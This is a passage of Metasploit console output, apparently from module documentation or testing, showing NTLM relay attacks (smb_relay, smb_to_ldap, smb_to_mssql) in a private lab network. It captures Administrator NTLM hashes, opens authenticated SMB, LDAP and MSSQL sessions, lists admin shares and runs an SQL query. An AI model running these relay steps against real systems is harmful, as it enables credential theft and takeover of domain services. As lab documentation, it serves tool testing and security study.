D, [2026-03-25T13:37:43.291922 #78580] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 206753597, user_id: "\\Administrator", state: :valid>)
[*] 172.16.199.200:445 - Received request for \Administrator
[*] 172.16.199.200:445 - Identity: \Administrator - All targets relayed to
D, [2026-03-25T13:37:43.293934 #78580] DEBUG -- : Received TREE_CONNECT request for share: IPC$
D, [2026-03-25T13:37:43.297629 #78580] DEBUG -- : Dispatching request to do_ioctl_smb2 (session: #<Session id: 206753597, user_id: "\\Administrator", state: :valid>)
D, [2026-03-25T13:37:43.297876 #78580] DEBUG -- : Received IOCTL request for share: IPC$
D, [2026-03-25T13:37:43.301130 #78580] DEBUG -- : Dispatching request to do_logoff_smb2 (session: #<Session id: 206753597, user_id: "\\Administrator", state: :valid>)
D, [2026-03-25T13:37:43.314568 #78580] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
E, [2026-03-25T13:37:43.323967 #78580] ERROR -- : Failed to parse the ASN1-encoded authentication request (too long)
I, [2026-03-25T13:37:43.324282 #78580]  INFO -- : Ending thread for connection from 172.16.199.137
[*] 172.16.199.200:445 - New request from 172.16.199.137
I, [2026-03-25T13:37:43.330454 #78580]  INFO -- : Starting thread for connection from 172.16.199.137
I, [2026-03-25T13:37:43.350014 #78580]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-25T13:37:43.355435 #78580] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
[*] 172.16.199.200:445 - Relaying to next target smb://172.16.199.200:445
I, [2026-03-25T13:37:43.361055 #78580]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: false)
D, [2026-03-25T13:37:43.381538 #78580] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 146595297, user_id: nil, state: :in_progress>)
I, [2026-03-25T13:37:43.384457 #78580]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as
[+] 172.16.199.200:445 - Identity:  - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : \Administrator
[SMB] NTLMv2-SSP Hash       : Administrator:::e9e388b048379249:0a43930b7edb46022efc81c19b2266a5:010100000000000010f6333b97bcdc011efc3092633dcaea00000000020010004b00450052004200450052004f0053000100060044004300320004001c006b00650072006200650072006f0073002e0069007300730075006500030024006400630032002e006b00650072006200650072006f0073002e006900730073007500650005001c006b00650072006200650072006f0073002e00690073007300750065000700080010f6333b97bcdc0106000400020000000800300030000000000000000000000000300000e7c4c66ded8cbd6c6939c39a150d2fc7dfb6a9d4f5a49074238541a4dfa08c9e0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100390039002e0031000000000000000000

[*] SMB session 10 opened (172.16.199.1:57519 -> 172.16.199.200:445) at 2026-03-25 13:38:03 -0700
I, [2026-03-25T13:38:03.672310 #78580]  INFO -- : Ending thread for connection from 172.16.199.137

msf exploit(windows/smb/smb_relay) > sessions -i 10
[*] Starting interaction with 10...

SMB (172.16.199.200) > shares
Shares
======

    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  IPC$      IPC|SPECIAL   Remote IPC
    3  NETLOGON  DISK          Logon server share
    4  SYSVOL    DISK          Logon server share

SMB (172.16.199.200) >
```

### smb_to_ldap
```
msf auxiliary(server/relay/smb_to_ldap) > run
[*] Auxiliary module running as background job 13.
msf auxiliary(server/relay/smb_to_ldap) >
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 172.16.199.137
[*] Received request for \Administrator
[*] Relaying to next target ldap://172.16.199.200:389
[+] Identity: \Administrator - Successfully authenticated against relay target ldap://172.16.199.200:389
[SMB] NTLMv1-SSP Client     : 172.16.199.200
[SMB] NTLMv1-SSP Username   : \Administrator
[SMB] NTLMv1-SSP Hash       : Administrator:::7436b9e630b269ff00000000000000000000000000000000:d9bdec8da79137693130fc11ed9b90fb9a0f4bdef8728c69:f137eca33ac48acc

[+] Relay succeeded
[*] LDAP session 12 opened (172.16.199.1:57642 -> 172.16.199.200:389) at 2026-03-25 13:51:37 -0700
[*] Received request for \Administrator
[*] Identity: \Administrator - All targets relayed to
[*] New request from 172.16.199.137
[*] Relaying to next target ldap://172.16.199.200:389
[+] Identity:  - Successfully authenticated against relay target ldap://172.16.199.200:389
[SMB] NTLMv1-SSP Client     : 172.16.199.200
[SMB] NTLMv1-SSP Username   : \Administrator
[SMB] NTLMv1-SSP Hash       : Administrator:::2d40f170125bfdaf00000000000000000000000000000000:084fd41e6b28c9924243130d4616d12bae91f4c508ddd4b1:0c9b183085ab624e

[+] Relay succeeded

msf auxiliary(server/relay/smb_to_ldap) > sessions -i -1
[*] Starting interaction with 12...

LDAP (172.16.199.200) >
```

### smb_to_mssql
```
msf auxiliary(server/relay/smb_to_mssql) > run
[*] Auxiliary module running as background job 20.
msf auxiliary(server/relay/smb_to_mssql) >
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
Interrupt: use the 'exit' command to quit
msf auxiliary(server/relay/smb_to_mssql) >
[*] New request from 172.16.199.137
[*] Received request for \Administrator
[*] Relaying to next target mssql://172.16.199.200:1433
[+] Identity: \Administrator - Successfully authenticated against relay target mssql://172.16.199.200:1433
[SMB] NTLMv1-SSP Client     : 172.16.199.200
[SMB] NTLMv1-SSP Username   : \Administrator
[SMB] NTLMv1-SSP Hash       : Administrator:::1fe1d45fb7c8578700000000000000000000000000000000:e7fbc332e5144c67f02f0314b22060e47a37f11ae5a52a5c:51b2f1563194701d

[+] Relay succeeded
[*] MSSQL session 13 opened (172.16.199.1:59392 -> 172.16.199.200:1433) at 2026-03-25 17:37:58 -0700
[*] Received request for \Administrator
[*] Identity: \Administrator - All targets relayed to
[*] New request from 172.16.199.137
[*] Relaying to next target mssql://172.16.199.200:1433
[+] Identity:  - Successfully authenticated against relay target mssql://172.16.199.200:1433
[SMB] NTLMv1-SSP Client     : 172.16.199.200
[SMB] NTLMv1-SSP Username   : \Administrator
[SMB] NTLMv1-SSP Hash       : Administrator:::816b7dc47a35465d00000000000000000000000000000000:291dea6c0a94eff931b1caf2ef3e8c2bf1261e1035106adb:0f0873c776ba980c

[+] Relay succeeded

msf auxiliary(server/relay/smb_to_mssql) > sessions -i -1
[*] Starting interaction with 13...

mssql @ 172.16.199.200:1433 (master) > query 'SELECT @@version;'
Response
========

    #  NULL
    -  ----
    0  Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
	Sep 24 2019 13:48:23
	Copyright (C) 2019 Microsoft Corporation
	Developer Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

mssql @ 172.16.199.200:1433 (master) >
```
